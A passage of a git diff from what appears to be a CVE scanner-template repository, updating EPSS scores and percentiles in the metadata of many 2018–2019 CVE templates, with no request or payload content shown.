cpe:2.3:a:oracle:webcenter_sites:11.1.1.8.0:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-3167.yaml b/http/cves/2018/CVE-2018-3167.yaml index eff49923de2..458eff5f2aa 100644 --- a/http/cves/2018/CVE-2018-3167.yaml +++ b/http/cves/2018/CVE-2018-3167.yaml @@ -20,7 +20,7 @@ info: cvss-score: 5.3 cve-id: CVE-2018-3167 epss-score: 0.68033 - epss-percentile: 0.98531 + epss-percentile: 0.98534 cpe: cpe:2.3:a:oracle:application_management_pack:12.1.3:*:*:*:*:e-business_suite:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-3238.yaml b/http/cves/2018/CVE-2018-3238.yaml index 7c5ec6116ba..00d0e7825d2 100644 --- a/http/cves/2018/CVE-2018-3238.yaml +++ b/http/cves/2018/CVE-2018-3238.yaml @@ -20,7 +20,7 @@ info: cvss-score: 6.9 cve-id: CVE-2018-3238 epss-score: 0.30481 - epss-percentile: 0.96558 + epss-percentile: 0.96561 cpe: cpe:2.3:a:oracle:webcenter_sites:11.1.1.8.0:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2018/CVE-2018-3714.yaml b/http/cves/2018/CVE-2018-3714.yaml index 4a0edefac48..26e44f74368 100644 --- a/http/cves/2018/CVE-2018-3714.yaml +++ b/http/cves/2018/CVE-2018-3714.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-3714 cwe-id: CWE-22 epss-score: 0.74418 - epss-percentile: 0.98798 + epss-percentile: 0.98796 cpe: cpe:2.3:a:node-srv_project:node-srv:*:*:*:*:*:node.js:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-5230.yaml b/http/cves/2018/CVE-2018-5230.yaml index b7046badea4..dfa85aa04cc 100644 --- a/http/cves/2018/CVE-2018-5230.yaml +++ b/http/cves/2018/CVE-2018-5230.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2018-5230 cwe-id: CWE-79 epss-score: 0.24983 - epss-percentile: 0.9599 + epss-percentile: 0.95993 cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-5233.yaml b/http/cves/2018/CVE-2018-5233.yaml index e4afed1e961..fdc02607415 100644 --- a/http/cves/2018/CVE-2018-5233.yaml +++ b/http/cves/2018/CVE-2018-5233.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-5233 cwe-id: CWE-79 epss-score: 0.18828 - epss-percentile: 0.95084 + epss-percentile: 0.95083 cpe: cpe:2.3:a:getgrav:grav_cms:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-5316.yaml b/http/cves/2018/CVE-2018-5316.yaml index b66fe9e3dad..3693f2ff9fe 100644 --- a/http/cves/2018/CVE-2018-5316.yaml +++ b/http/cves/2018/CVE-2018-5316.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-5316 cwe-id: CWE-79 epss-score: 0.02338 - epss-percentile: 0.84443 + epss-percentile: 0.84439 cpe: cpe:2.3:a:patsatech:sagepay_server_gateway_for_woocommerce:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-6184.yaml b/http/cves/2018/CVE-2018-6184.yaml index 86afe964fd8..f3d5a631c61 100644 --- a/http/cves/2018/CVE-2018-6184.yaml +++ b/http/cves/2018/CVE-2018-6184.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2018-6184 cwe-id: CWE-22 epss-score: 0.49051 - epss-percentile: 0.97679 + epss-percentile: 0.97674 cpe: cpe:2.3:a:zeit:next.js:4.0.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-6200.yaml b/http/cves/2018/CVE-2018-6200.yaml index e81b8cf0319..a648947b2d9 100644 --- a/http/cves/2018/CVE-2018-6200.yaml +++ b/http/cves/2018/CVE-2018-6200.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-6200 cwe-id: CWE-601 epss-score: 0.29986 - epss-percentile: 0.96506 + epss-percentile: 0.96508 cpe: cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-6530.yaml b/http/cves/2018/CVE-2018-6530.yaml index 2eb81d5c2f0..96beb15fe8d 100644 --- a/http/cves/2018/CVE-2018-6530.yaml +++ b/http/cves/2018/CVE-2018-6530.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2018-6530 cwe-id: CWE-78 epss-score: 0.94294 - epss-percentile: 0.99937 + epss-percentile: 0.99938 cpe: cpe:2.3:o:dlink:dir-860l_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-6882.yaml b/http/cves/2018/CVE-2018-6882.yaml index e896270390b..58cf44f26a7 100644 --- a/http/cves/2018/CVE-2018-6882.yaml +++ b/http/cves/2018/CVE-2018-6882.yaml @@ -18,7 +18,7 @@ info: cvss-score: 6.8 cve-id: CVE-2018-6882 epss-score: 0.63352 - epss-percentile: 0.98336 + epss-percentile: 0.98338 cwe-id: CWE-79 cpe: cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:* metadata: diff --git a/http/cves/2018/CVE-2018-6961.yaml b/http/cves/2018/CVE-2018-6961.yaml index c1f8fdd94f3..6469bba7410 100644 --- a/http/cves/2018/CVE-2018-6961.yaml +++ b/http/cves/2018/CVE-2018-6961.yaml @@ -18,8 +18,8 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.1 cve-id: CVE-2018-6961 - epss-score: 0.93224 - epss-percentile: 0.99787 + epss-score: 0.93733 + epss-percentile: 0.9984 cwe-id: CWE-78 metadata: verified: true diff --git a/http/cves/2018/CVE-2018-7192.yaml b/http/cves/2018/CVE-2018-7192.yaml index e14db102aa8..0f997ef390f 100644 --- a/http/cves/2018/CVE-2018-7192.yaml +++ b/http/cves/2018/CVE-2018-7192.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2018-7192 cwe-id: CWE-79 - epss-score: 0.00775 - epss-percentile: 0.73112 + epss-score: 0.00271 + epss-percentile: 0.50261 cpe: cpe:2.3:a:osticket:osticket:*:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2018/CVE-2018-7193.yaml b/http/cves/2018/CVE-2018-7193.yaml index d8238f0a7df..9e9eaec95f3 100644 --- a/http/cves/2018/CVE-2018-7193.yaml +++ b/http/cves/2018/CVE-2018-7193.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-7193 cwe-id: CWE-79 epss-score: 0.00533 - epss-percentile: 0.66776 + epss-percentile: 0.66759 cpe: cpe:2.3:a:osticket:osticket:*:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2018/CVE-2018-7196.yaml b/http/cves/2018/CVE-2018-7196.yaml index 78eb092a366..d15bb675cc0 100644 --- a/http/cves/2018/CVE-2018-7196.yaml +++ b/http/cves/2018/CVE-2018-7196.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-7196 cwe-id: CWE-79 epss-score: 0.00533 - epss-percentile: 0.66776 + epss-percentile: 0.66759 cpe: cpe:2.3:a:osticket:osticket:*:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2018/CVE-2018-7251.yaml b/http/cves/2018/CVE-2018-7251.yaml index b0c8dc79206..29ce0b9c473 100644 --- a/http/cves/2018/CVE-2018-7251.yaml +++ b/http/cves/2018/CVE-2018-7251.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2018-7251 cwe-id: CWE-200 epss-score: 0.9088 - epss-percentile: 0.99611 + epss-percentile: 0.99609 cpe: cpe:2.3:a:anchorcms:anchor:0.12.3:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-7282.yaml b/http/cves/2018/CVE-2018-7282.yaml index 8ce4e22fe65..0470173a722 100644 --- a/http/cves/2018/CVE-2018-7282.yaml +++ b/http/cves/2018/CVE-2018-7282.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-7282 cwe-id: CWE-89 epss-score: 0.6882 - epss-percentile: 0.98569 + epss-percentile: 0.9857 cpe: cpe:2.3:a:titool:printmonitor:*:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2018/CVE-2018-7314.yaml b/http/cves/2018/CVE-2018-7314.yaml index 647a3977d5f..a94f14ac0f7 100644 --- a/http/cves/2018/CVE-2018-7314.yaml +++ b/http/cves/2018/CVE-2018-7314.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-7314 cwe-id: CWE-89 epss-score: 0.90805 - epss-percentile: 0.99604 + epss-percentile: 0.99603 cpe: cpe:2.3:a:mlwebtechnologies:prayercenter:3.0.2:*:*:*:*:joomla\!:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-7653.yaml b/http/cves/2018/CVE-2018-7653.yaml index 4830dbfb5bd..80d4ead6356 100644 --- a/http/cves/2018/CVE-2018-7653.yaml +++ b/http/cves/2018/CVE-2018-7653.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-7653 cwe-id: CWE-79 epss-score: 0.01096 - epss-percentile: 0.77537 + epss-percentile: 0.77534 cpe: cpe:2.3:a:yzmcms:yzmcms:3.6:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-7700.yaml b/http/cves/2018/CVE-2018-7700.yaml index c6b3b2ee261..c8bc83e3ccb 100644 --- a/http/cves/2018/CVE-2018-7700.yaml +++ b/http/cves/2018/CVE-2018-7700.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2018-7700 cwe-id: CWE-352 epss-score: 0.93575 - epss-percentile: 0.99821 + epss-percentile: 0.99823 cpe: cpe:2.3:a:dedecms:dedecms:5.7:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-7765.yaml b/http/cves/2018/CVE-2018-7765.yaml index e995e41ce7f..e774068fdec 100644 --- a/http/cves/2018/CVE-2018-7765.yaml +++ b/http/cves/2018/CVE-2018-7765.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-7765 cwe-id: CWE-89 epss-score: 0.1749 - epss-percentile: 0.94864 + epss-percentile: 0.94863 cpe: cpe:2.3:a:schneider-electric:u.motion_builder:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-7841.yaml b/http/cves/2018/CVE-2018-7841.yaml index f63bd56eab8..fb18d81fd1b 100644 --- a/http/cves/2018/CVE-2018-7841.yaml +++ b/http/cves/2018/CVE-2018-7841.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2018-7841 cwe-id: CWE-78 - epss-score: 0.53349 - epss-percentile: 0.97888 + epss-score: 0.5238 + epss-percentile: 0.97832 cpe: cpe:2.3:a:schneider-electric:u.motion_builder:1.3.4:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-8024.yaml b/http/cves/2018/CVE-2018-8024.yaml index 5c6d3b85dc2..d556ac4f90a 100644 --- a/http/cves/2018/CVE-2018-8024.yaml +++ b/http/cves/2018/CVE-2018-8024.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-8024 cwe-id: CWE-79 epss-score: 0.5025 - epss-percentile: 0.97744 + epss-percentile: 0.97739 cpe: cpe:2.3:a:apache:spark:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-8033.yaml b/http/cves/2018/CVE-2018-8033.yaml index 71cd4ba923d..f9d5ff22168 100644 --- a/http/cves/2018/CVE-2018-8033.yaml +++ b/http/cves/2018/CVE-2018-8033.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2018-8033 cwe-id: CWE-200 - epss-score: 0.92044 - epss-percentile: 0.99687 + epss-score: 0.922 + epss-percentile: 0.99701 cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-8719.yaml b/http/cves/2018/CVE-2018-8719.yaml index 66099fbf92d..745bc87f825 100644 --- a/http/cves/2018/CVE-2018-8719.yaml +++ b/http/cves/2018/CVE-2018-8719.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2018-8719 cwe-id: CWE-532 epss-score: 0.1532 - epss-percentile: 0.94418 + epss-percentile: 0.94415 cpe: cpe:2.3:a:wpsecurityauditlog:wp_security_audit_log:3.1.1:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-8727.yaml b/http/cves/2018/CVE-2018-8727.yaml index fc23c08ac8f..d40f6971a35 100644 --- a/http/cves/2018/CVE-2018-8727.yaml +++ b/http/cves/2018/CVE-2018-8727.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-8727 cwe-id: CWE-22 epss-score: 0.52255 - epss-percentile: 0.97829 + epss-percentile: 0.97825 cpe: cpe:2.3:a:mirasys:dvms_workstation:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-8770.yaml b/http/cves/2018/CVE-2018-8770.yaml index 7f33bda4785..6cb1d389441 100644 --- a/http/cves/2018/CVE-2018-8770.yaml +++ b/http/cves/2018/CVE-2018-8770.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-8770 cwe-id: CWE-200 epss-score: 0.58047 - epss-percentile: 0.98105 + epss-percentile: 0.98106 cpe: cpe:2.3:a:cobub:razor:0.8.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-9205.yaml b/http/cves/2018/CVE-2018-9205.yaml index 06e1558828a..49aca4910ea 100644 --- a/http/cves/2018/CVE-2018-9205.yaml +++ b/http/cves/2018/CVE-2018-9205.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-9205 cwe-id: CWE-22 epss-score: 0.81446 - epss-percentile: 0.99137 + epss-percentile: 0.99139 cpe: cpe:2.3:a:drupal:avatar_uploader:7.x-1.0:beta8:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-9206.yaml b/http/cves/2018/CVE-2018-9206.yaml index 2f626024731..36f74419cb4 100644 --- a/http/cves/2018/CVE-2018-9206.yaml +++ b/http/cves/2018/CVE-2018-9206.yaml @@ -19,8 +19,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-9206 - epss-score: 0.93931 - epss-percentile: 0.9987 + epss-score: 0.94069 + epss-percentile: 0.99897 cwe-id: CWE-434 metadata: verified: true diff --git a/http/cves/2018/CVE-2018-9845.yaml b/http/cves/2018/CVE-2018-9845.yaml index 5c3f92556be..52d1317e713 100644 --- a/http/cves/2018/CVE-2018-9845.yaml +++ b/http/cves/2018/CVE-2018-9845.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-9845 cwe-id: CWE-178 epss-score: 0.65759 - epss-percentile: 0.98445 + epss-percentile: 0.98448 cpe: cpe:2.3:a:etherpad:etherpad_lite:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2019-10647.yaml b/http/cves/2018/CVE-2019-10647.yaml index 28d54569f52..0238056dfc1 100644 --- a/http/cves/2018/CVE-2019-10647.yaml +++ b/http/cves/2018/CVE-2019-10647.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2019-10647 cwe-id: CWE-434 epss-score: 0.61932 - epss-percentile: 0.98275 + epss-percentile: 0.98274 cpe: cpe:2.3:a:zzzcms:zzzphp:1.6.3:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-0221.yaml b/http/cves/2019/CVE-2019-0221.yaml index 2a9894da934..b04de084108 100644 --- a/http/cves/2019/CVE-2019-0221.yaml +++ b/http/cves/2019/CVE-2019-0221.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2019-0221 cwe-id: CWE-79 epss-score: 0.43363 - epss-percentile: 0.97394 + epss-percentile: 0.97391 cpe: cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-0230.yaml b/http/cves/2019/CVE-2019-0230.yaml index 1b74ff7b49e..c4cf2da9d81 100644 --- a/http/cves/2019/CVE-2019-0230.yaml +++ b/http/cves/2019/CVE-2019-0230.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-0230 cwe-id: CWE-1321 epss-score: 0.93727 - epss-percentile: 0.99838 + epss-percentile: 0.9984 cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-1003000.yaml b/http/cves/2019/CVE-2019-1003000.yaml index 8927e3132bf..1837273c54f 100644 --- a/http/cves/2019/CVE-2019-1003000.yaml +++ b/http/cves/2019/CVE-2019-1003000.yaml @@ -15,7 +15,7 @@ info: cvss-score: 8.8 cve-id: CVE-2019-1003000 epss-score: 0.94441 - epss-percentile: 0.99989 + epss-percentile: 0.99987 cpe: cpe:2.3:a:jenkins:script_security::::::jenkins::* reference: - https://jenkins.io/security/advisory/2019-01-08/#SECURITY-1266 diff --git a/http/cves/2019/CVE-2019-10092.yaml b/http/cves/2019/CVE-2019-10092.yaml index 3295c4d51f9..339866f632f 100644 --- a/http/cves/2019/CVE-2019-10092.yaml +++ b/http/cves/2019/CVE-2019-10092.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2019-10092 cwe-id: CWE-79 - epss-score: 0.82379 - epss-percentile: 0.99194 + epss-score: 0.81624 + epss-percentile: 0.99149 cpe: cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-1010287.yaml b/http/cves/2019/CVE-2019-1010287.yaml index 4490ac9707d..09f527053ea 100644 --- a/http/cves/2019/CVE-2019-1010287.yaml +++ b/http/cves/2019/CVE-2019-1010287.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-1010287 cwe-id: CWE-79 epss-score: 0.23951 - epss-percentile: 0.95849 + epss-percentile: 0.95853 cpe: cpe:2.3:a:timesheet_next_gen_project:timesheet_next_gen:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-1010290.yaml b/http/cves/2019/CVE-2019-1010290.yaml index a11d06e471c..019dff7b444 100644 --- a/http/cves/2019/CVE-2019-1010290.yaml +++ b/http/cves/2019/CVE-2019-1010290.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2019-1010290 cwe-id: CWE-601 epss-score: 0.21947 - epss-percentile: 0.95584 + epss-percentile: 0.95588 cpe: cpe:2.3:a:cmsmadesimple:bable\:multilingual_site:*:*:*:*:*:cms_made_simple:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-10232.yaml b/http/cves/2019/CVE-2019-10232.yaml index 4779da70a7a..cf226806234 100644 --- a/http/cves/2019/CVE-2019-10232.yaml +++ b/http/cves/2019/CVE-2019-10232.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-10232 cwe-id: CWE-89 epss-score: 0.89565 - epss-percentile: 0.99533 + epss-percentile: 0.99535 cpe: cpe:2.3:a:teclib-edition:gestionnaire_libre_de_parc_informatique:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-10405.yaml b/http/cves/2019/CVE-2019-10405.yaml index 82b422a3443..a32a98f61a3 100644 --- a/http/cves/2019/CVE-2019-10405.yaml +++ b/http/cves/2019/CVE-2019-10405.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2019-10405 cwe-id: CWE-79 epss-score: 0.81459 - epss-percentile: 0.99138 + epss-percentile: 0.9914 cpe: cpe:2.3:a:jenkins:jenkins:*:*:*:*:lts:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-10692.yaml b/http/cves/2019/CVE-2019-10692.yaml index 086add78ef5..00509efe84e 100644 --- a/http/cves/2019/CVE-2019-10692.yaml +++ b/http/cves/2019/CVE-2019-10692.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2019-10692 cwe-id: CWE-89 epss-score: 0.89285 - epss-percentile: 0.99521 + epss-percentile: 0.99523 cpe: cpe:2.3:a:codecabin:wp_go_maps:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-10717.yaml b/http/cves/2019/CVE-2019-10717.yaml index 285269a14c6..8ccc28f881a 100644 --- a/http/cves/2019/CVE-2019-10717.yaml +++ b/http/cves/2019/CVE-2019-10717.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2019-10717 cwe-id: CWE-22 epss-score: 0.1493 - epss-percentile: 0.9434 + epss-percentile: 0.94336 cpe: cpe:2.3:a:dotnetblogengine:blogengine.net:3.3.7.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-11013.yaml b/http/cves/2019/CVE-2019-11013.yaml index 21f7f038a7e..85f77e88787 100644 --- a/http/cves/2019/CVE-2019-11013.yaml +++ b/http/cves/2019/CVE-2019-11013.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-11013 cwe-id: CWE-22 epss-score: 0.87349 - epss-percentile: 0.9943 + epss-percentile: 0.99431 cpe: cpe:2.3:a:softvelum:nimble_streamer:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-11248.yaml b/http/cves/2019/CVE-2019-11248.yaml index 6ad05b098f6..42550d36fc9 100644 --- a/http/cves/2019/CVE-2019-11248.yaml +++ b/http/cves/2019/CVE-2019-11248.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2019-11248 cwe-id: CWE-862,CWE-419 epss-score: 0.91212 - epss-percentile: 0.99631 + epss-percentile: 0.9963 cpe: cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-11253.yaml b/http/cves/2019/CVE-2019-11253.yaml index 189b9f7a011..176eab53dab 100644 --- a/http/cves/2019/CVE-2019-11253.yaml +++ b/http/cves/2019/CVE-2019-11253.yaml @@ -18,8 +18,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H cvss-score: 7.5 cve-id: CVE-2019-11253 - epss-score: 0.86289 - epss-percentile: 0.99381 + epss-score: 0.81952 + epss-percentile: 0.99168 cwe-id: CWE-400 metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-11370.yaml b/http/cves/2019/CVE-2019-11370.yaml index 1f853ab4694..1b7d4fccd41 100644 --- a/http/cves/2019/CVE-2019-11370.yaml +++ b/http/cves/2019/CVE-2019-11370.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-11370 cwe-id: CWE-79 epss-score: 0.07622 - epss-percentile: 0.916 + epss-percentile: 0.91599 cpe: cpe:2.3:o:carel:pcoweb_card_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-11507.yaml b/http/cves/2019/CVE-2019-11507.yaml index 9e5623b75ab..722fe67cb57 100644 --- a/http/cves/2019/CVE-2019-11507.yaml +++ b/http/cves/2019/CVE-2019-11507.yaml @@ -17,8 +17,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2019-11507 - epss-score: 0.00741 - epss-percentile: 0.72469 + epss-score: 0.00863 + epss-percentile: 0.74592 cwe-id: CWE-79 cpe: cpe:2.3:a:ivanti:connect_secure:8.3:r1:*:*:*:*:*:* metadata: diff --git a/http/cves/2019/CVE-2019-11510.yaml b/http/cves/2019/CVE-2019-11510.yaml index b038ff08cb4..ee5fb4a3cee 100644 --- a/http/cves/2019/CVE-2019-11510.yaml +++ b/http/cves/2019/CVE-2019-11510.yaml @@ -20,8 +20,8 @@ info: cvss-score: 10 cve-id: CVE-2019-11510 cwe-id: CWE-22 - epss-score: 0.9438 - epss-percentile: 0.99965 + epss-score: 0.9446 + epss-percentile: 0.99992 cpe: cpe:2.3:a:ivanti:connect_secure:9.0:r1:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-11580.yaml b/http/cves/2019/CVE-2019-11580.yaml index fae7d30a209..d82849a9fd3 100644 --- a/http/cves/2019/CVE-2019-11580.yaml +++ b/http/cves/2019/CVE-2019-11580.yaml @@ -20,7 +20,7 @@ info: cvss-score: 9.8 cve-id: CVE-2019-11580 epss-score: 0.94386 - epss-percentile: 0.99968 + epss-percentile: 0.99967 cpe: cpe:2.3:a:atlassian:crowd:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-11869.yaml b/http/cves/2019/CVE-2019-11869.yaml index 61e8270623b..fe53505024a 100644 --- a/http/cves/2019/CVE-2019-11869.yaml +++ b/http/cves/2019/CVE-2019-11869.yaml @@ -27,7 +27,7 @@ info: cve-id: CVE-2019-11869 cwe-id: CWE-79 epss-score: 0.05601 - epss-percentile: 0.90046 + epss-percentile: 0.90045 cpe: cpe:2.3:a:yuzopro:yuzo:5.12.94:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-11886.yaml b/http/cves/2019/CVE-2019-11886.yaml index 04db024e05e..a242b56c212 100644 --- a/http/cves/2019/CVE-2019-11886.yaml +++ b/http/cves/2019/CVE-2019-11886.yaml @@ -19,7 +19,7 @@ info: cvss-score: 8.8 cve-id: CVE-2019-11886 epss-score: 0.28566 - epss-percentile: 0.96384 + epss-percentile: 0.96387 cwe-id: CWE-352 cpe: cpe:2.3:a:yellowpencil:visual_css_style_editor:*:*:*:*:*:wordpress:*:* metadata: diff --git a/http/cves/2019/CVE-2019-12461.yaml b/http/cves/2019/CVE-2019-12461.yaml index d1eed0926fb..c227d4461e7 100644 --- a/http/cves/2019/CVE-2019-12461.yaml +++ b/http/cves/2019/CVE-2019-12461.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-12461 cwe-id: CWE-79 epss-score: 0.55026 - epss-percentile: 0.97968 + epss-percentile: 0.97966 cpe: cpe:2.3:a:webport:web_port:1.19.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-12581.yaml b/http/cves/2019/CVE-2019-12581.yaml index 7f6f7d2b1a0..d73c2765c1e 100644 --- a/http/cves/2019/CVE-2019-12581.yaml +++ b/http/cves/2019/CVE-2019-12581.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-12581 cwe-id: CWE-79 epss-score: 0.55651 - epss-percentile: 0.98 + epss-percentile: 0.97998 cpe: cpe:2.3:h:zyxel:uag2100:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-12593.yaml b/http/cves/2019/CVE-2019-12593.yaml index f991e78b4ba..3d72d5a52f0 100644 --- a/http/cves/2019/CVE-2019-12593.yaml +++ b/http/cves/2019/CVE-2019-12593.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2019-12593 cwe-id: CWE-22 - epss-score: 0.75083 - epss-percentile: 0.98831 + epss-score: 0.79347 + epss-percentile: 0.99033 cpe: cpe:2.3:a:icewarp:mail_server:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-12935.yaml b/http/cves/2019/CVE-2019-12935.yaml index 7ed0c174f56..862cc222623 100644 --- a/http/cves/2019/CVE-2019-12935.yaml +++ b/http/cves/2019/CVE-2019-12935.yaml @@ -18,7 +18,7 @@ info: cvss-score: 7.4 cve-id: CVE-2019-12935 epss-score: 0.00596 - epss-percentile: 0.68742 + epss-percentile: 0.68729 cwe-id: CWE-79 metadata: verified: false diff --git a/http/cves/2019/CVE-2019-12962.yaml b/http/cves/2019/CVE-2019-12962.yaml index a2ffc50e1fd..e650f83f294 100644 --- a/http/cves/2019/CVE-2019-12962.yaml +++ b/http/cves/2019/CVE-2019-12962.yaml @@ -21,8 +21,8 @@ info: cvss-score: 6.1 cve-id: CVE-2019-12962 cwe-id: CWE-79 - epss-score: 0.06302 - epss-percentile: 0.90668 + epss-score: 0.04742 + epss-percentile: 0.89095 cpe: cpe:2.3:a:livezilla:livezilla:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-12989.yaml b/http/cves/2019/CVE-2019-12989.yaml index a8c39454bc1..0f9031af83f 100644 --- a/http/cves/2019/CVE-2019-12989.yaml +++ b/http/cves/2019/CVE-2019-12989.yaml @@ -20,7 +20,7 @@ info: cvss-score: 9.8 cve-id: CVE-2019-12989 epss-score: 0.91054 - epss-percentile: 0.99621 + epss-percentile: 0.9962 cwe-id: CWE-89 cpe: cpe:2.3:a:citrix:netscaler_sd-wan:*:*:*:*:*:*:*:* metadata: diff --git a/http/cves/2019/CVE-2019-13392.yaml b/http/cves/2019/CVE-2019-13392.yaml index e71f1fd3504..1d64d95f4a3 100644 --- a/http/cves/2019/CVE-2019-13392.yaml +++ b/http/cves/2019/CVE-2019-13392.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-13392 cwe-id: CWE-79 epss-score: 0.06053 - epss-percentile: 0.9045 + epss-percentile: 0.90452 cpe: cpe:2.3:a:mindpalette:natemail:3.0.15:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-13396.yaml 